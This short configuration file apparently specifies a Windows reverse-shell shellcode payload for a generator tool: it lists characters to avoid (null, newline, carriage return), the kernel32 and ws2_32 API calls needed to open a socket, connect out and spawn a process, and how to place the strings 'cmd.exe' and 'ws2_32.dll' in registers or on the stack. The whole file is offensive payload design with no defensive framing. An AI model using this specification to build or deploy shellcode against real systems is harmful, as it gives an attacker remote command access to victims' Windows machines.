# Reverse shell — kernel32 + ws2_32
badchars: ["00", "0a", "0d"]

functions:
  - CreateProcessA
  - LoadLibraryA
  - GetProcAddress
  - ExitProcess
  - WinExec
  - WSAStartup
  - WSASocketA
  - connect

variables:
  - socket_handle

strings:
  - label: cmd
    value: cmd.exe
    method: mov
    dest: edi
  - label: ws2_dll
    value: ws2_32.dll
    method: push
